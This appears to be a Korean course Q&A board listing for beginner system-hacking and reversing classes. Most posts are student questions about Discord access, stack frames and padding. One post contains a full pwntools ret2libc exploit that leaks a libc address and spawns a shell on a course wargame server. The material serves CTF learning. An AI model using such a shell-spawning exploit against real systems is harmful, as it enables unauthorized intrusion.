세월이 흘러 문제가 바뀐 것 같습니다.
미해결
취미로 해킹#1(OverTheWire - Bandit)
전혀 다른 상황인 것 같아요. https://overthewire.org/wargames/bandit/bandit1.html (수정) sftp 문제가 삭제된 듯 하네요.
- linux
- 시스템-해킹
173만명의 커뮤니티!! 함께 토론해봐요.
미해결
취미로 해킹#1(OverTheWire - Bandit)
전혀 다른 상황인 것 같아요. https://overthewire.org/wargames/bandit/bandit1.html (수정) sftp 문제가 삭제된 듯 하네요.
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
디스코드 링크가 올바르지 않는 초대장이라고 떠요 여러번 시도해도 안됩니다.
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
안녕하세요. 기재된 디스코드 채널에서 이메일, 트랙(WEB)으로 등록했는데 Q&A를 보니 다른 트랙으로 등록을 하는 게 맞는 것 같아 수정 문의 드립니다. ticket-0451이고 추가로 필요한 정보가 있으시면 답변 부탁드립니다. 감사합니다.
미해결
누구도 알려주지 않던 화이트 해커가 되기 위한 로드맵 A to Z
IoT 해킹 강의도 접해보고 싶습니다 좋은 강의 감사합니다
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
안녕하세요. 디스코드가 뭔지 잘 몰라서 헤매다가 WEB트랙으로 잘못 신청했습니다. REV&PWN로 변경하려고 하니 티켓 limit이 걸렸다고 하는데 혹시 해결할 방법이 있을까요?
해결됨
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
from pwn import * context.log_level = 'debug' p = remote("war.knock-on.org", 45240) e = ELF("./rop64") libc = ELF("./libc.so.6") rdi = 0x0000000000401176 payload = b'a' * 0x28 payload += p64(rdi) payload += p64(e.got['read']) payload += p64(e.plt['puts']) payload += p64(e.symbols['main']) p.sendafter("name?\n", payload) read_got = u64(p.recvline().strip(b'\n')+b'\x00\x00') libc_base = read_got - libc.symbols['read'] print(f"read_got: {hex(read_got)}") print(f"libc_base: {hex(read_got)}") binsh = libc_base + 0x1d8678 system_got = libc_base + libc.symbols['system'] ret = 0x000000000040101a payload = b'a' * 0x28 payload += p64(rdi) payload += p64(binsh) payload += p64(ret) payload += p64(system_got) pause() p.sendafter("name?\n", payload) p.interactive()
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
여기서 flag를 ls 입력하면 나와야 되지 않나요..? 왜 안나오는지 모르겠어요
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
이렇게 코드를 짜고 쉘을 땃는데 ls하면 안 나와요 왜 그런가요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
스택이 정렬이 되지 않은걸 리턴 함수를 다시 콜하면 왜 해결되나요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
마지막에 왜 python3 exp.py가 실행이 안돼는지 모르겠어요, ai말고 답변 달아주시면 감사하겠습니다!!
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
여기서 왜 안 될까요? 그리고 자꾸 서버에 연결이 안돼요...
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
강의에서 a를 28개 입력하자 실패, 29개 입력하자 성공이 나왔는데 28개도 실패가 나와야 하지 않나요? 체크는 버프 저장 값 다음에 위치하고 체크에 값이 0이 아니면 성공이니 25개의 a를 넣으면 성공 아닌가요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
왜 체크가 16바이트 중 4바이트라고 뒤에 저장 되나요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
패딩은 빈 공간을 채우기 위해 사용한다고 gpt가 그러는데 맞을까요? 그리고 이 경우 stack의 sfp와 ret은 뭔가요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
gdb로 스택의 구조를 확인하는 부분에서 어디가 버퍼인지는 들어가는 값을 보고 알거 같은데 sfp, ret은 뭘 보고 해당 부분이 sfp나 ret인지 알 수 있는 지 모르겠습니다.
해결됨
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
리버스 베이직 2 문제 파일을 다운 받고 ida에서 디컴파일 했더니 소스코드가 베이직1이랑 같은 값이 나왔고 3파일도 같은 소스코드가 나왔어요. 왜 그런가요...ㅠ
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
핸드래이1,2는 어디서 받는지 알겠는데 버블을 어디서 받아야 하나요?
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
수업에 입장하여 LMS 등록을 하기위해 Discord에 접근하고자 하니 올바르지 않은 초대장이라는 문구가 나왔습니다. Discord 공식 ( https://support.discord.com/hc/ko/articles/360001556852-%EC%9E%98%EB%AA%BB%EB%90%9C-%EC%B4%88%EB%8C%80-%EB%A7%81%ED%81%AC ) Refernce에선 티켓 만료나 인원제한이라고 나와있습니다. 확인 및 해결 부탁드립니다
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
디스코드 서버에 참여하려고 하는데 디스코드 링크가 만료되거나 유효하지 않다고 하네요
미해결
해킹 입문부터 중급까지, 한 번에 배우는 시스템 해킹 & 리버싱
add esp,0x8을 보고 어떻게 내부가 아닌 함수 외부에서 에필로그가 적히는 건지 이해가 가지 않습니다.